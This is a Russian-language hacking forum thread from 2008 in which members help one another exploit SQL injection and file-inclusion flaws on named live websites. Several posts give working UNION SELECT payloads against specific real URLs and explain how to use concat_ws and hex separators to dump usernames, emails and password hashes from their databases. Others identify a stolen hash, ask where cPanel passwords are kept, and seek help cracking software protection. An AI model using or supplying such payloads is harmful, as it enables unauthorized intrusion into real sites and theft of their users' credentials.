Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Не уязвимость. Просто ошибка. Что то ты с синтаксисом намудрил
     
    1 person likes this.
  2. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    И вполне уязвимость, ошибка т.к. ты заэкранировал '. Попробуй передать \' , и посмотри что будет, вполне возможно, что кавычка будет экранироваться, но ты это экранирование убъёшь при помощи \., т.е. получится \\' , а значит ' - будет частью команды SQL, а не просто текстовым символом.

    А может и ' не заэкранируется вообще, тогда ещё проще.
     
    1 person likes this.
  3. Flash-ICE

    Flash-ICE Banned

    Joined:
    11 Nov 2007
    Messages:
    13
    Likes Received:
    5
    Reputations:
    -5
    http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

    Не могу работать с 1 колонкой как выводить юзеров я даж не представляю

    ЗЫ глядим в заголовок
     
  4. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    исполбзуй конструкцию concat, например так:
     
  5. Flash-ICE

    Flash-ICE Banned

    Joined:
    11 Nov 2007
    Messages:
    13
    Likes Received:
    5
    Reputations:
    -5
    а как ее юзать??? Точнее почему иногда ставиться в скобках 0x3a3a или shar (58) Где про это можно почитать
     
  6. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    0x3a3a - это шестнадцтиричный код без 0x ..
    shar (58) - пишется char(58) - 58 это ascii код двоеточия :
    как я понял тебе интересно зачем это используется в скулях - так вот - это пишут для разделения полученых данных ..
    0x3a ничем не отличается от char(58) ..
     
    #2526 159932, 6 Jul 2008
    Last edited: 6 Jul 2008
  7. teen4jump

    teen4jump New Member

    Joined:
    2 Jul 2008
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    В поиске _http://investoru.info пишу '... вылазит:
    'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and (hl_listings.expiration = 0 || date_a' at line 13'
    Это уязвимость?
     
  8. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Да, простенькая инъекция, введи в поиске:
    Code:
    1') union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
    29 поле выводится
     
    1 person likes this.
  9. Flash-ICE

    Flash-ICE Banned

    Joined:
    11 Nov 2007
    Messages:
    13
    Likes Received:
    5
    Reputations:
    -5
    gisTy чет не допонял как вывести все таки можешь намекнешь?
     
  10. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Flash-ICE
     
  11. SUBJECT617

    SUBJECT617 Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    73
    Likes Received:
    34
    Reputations:
    -2
    2 Flash-ICE

    Еще можно юзать concat_ws(SQL hex разделителя,username,password,email,icq,blablabla)

    Имхо самый удобный ресурс для перевода в SQL hex - http://x3k.ru/

    А вообще так мог бы почитать статьи перед тем чтобы лезть туда. Прос concat и concat_ws это уже "приятное дополнение" к статьям, даже если этого незнаешь то инъекцию всеравно раскрутишь... но основу знать надо. Есть статья которая какраз и содержит пояснения к твоему случаю со скобкой.
     
    #2531 SUBJECT617, 6 Jul 2008
    Last edited: 6 Jul 2008
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    вопрос такой нашел пхп инклуд на сайте одном...вроде читаю пару файлов на сервере, но так как я в этом деле новичок хотелось бы узнать последствие моих действий, и ещё где хранятся пассы от Cpanel
     
  13. shikin

    shikin New Member

    Joined:
    4 Jul 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Прогрмма

    Подскажите пожалуйста куда обратится с вопросом по изличению программ от "жадности"?.
    Надо помощь ваша в снятии защиты, распаковке, а потом взломе Des. :)
     
  14. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    Вопрос такой,это че за тип хэша?
    Code:
    [email protected]:205abdfcc23287dea72cb534b5eee922561557ff4d04ed102e5a3ff8884216421f0e3dad99908345f7439f8ffabdffc4
    ЫЫЫ,хэш без пробелов конечно :)

    _http://www.menunsk.ru/places.php?id=0)+union+select+concat_ws(0x3a,mail,hesh),2+from+menunsk_mail+where+id=0x31/*
     
  15. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    DDoSька
    Скорее всего SHA384
     
    1 person likes this.
  16. tor4)

    tor4) Elder - Старейшина

    Joined:
    27 May 2008
    Messages:
    45
    Likes Received:
    21
    Reputations:
    -6
    2+union+select+1,concat_ws(0x3a,username,user_password),3+from+phpbb_users/*
    error на username

    2+union+select+1,concat_ws(0x3a,0x757365726e616d65,user_password),3+from+phpbb_users/*
    Пропускает но все логины меняются на username.

    ??? не хватает прав на прасмотор столбца username ???
     
  17. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    `username` - а так?
     
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Что это значит?
    Ты выводишь 2 столбца username и user_password,они выводятся. Что тебе не нравится?
    Какие логины? Вот таблицы по дефолту в PhpBB 2 phpbb_users:
    username
    user_password
    user_email
    user_icq
    user_aim
     
  19. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    просто tor4) закатал username в хекс, что собственно эквивалентно SELECT 'username' :D, поэтому вместо содержимого столбца username, выводится строка 'username' ;)
     
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Ааааа ,блин , я вопрос не сразу понял :D
    2 tor4)
    Врятли на столбец нет прав доступа, давай линк, посмотрим
     
Thread Status:
Not open for further replies.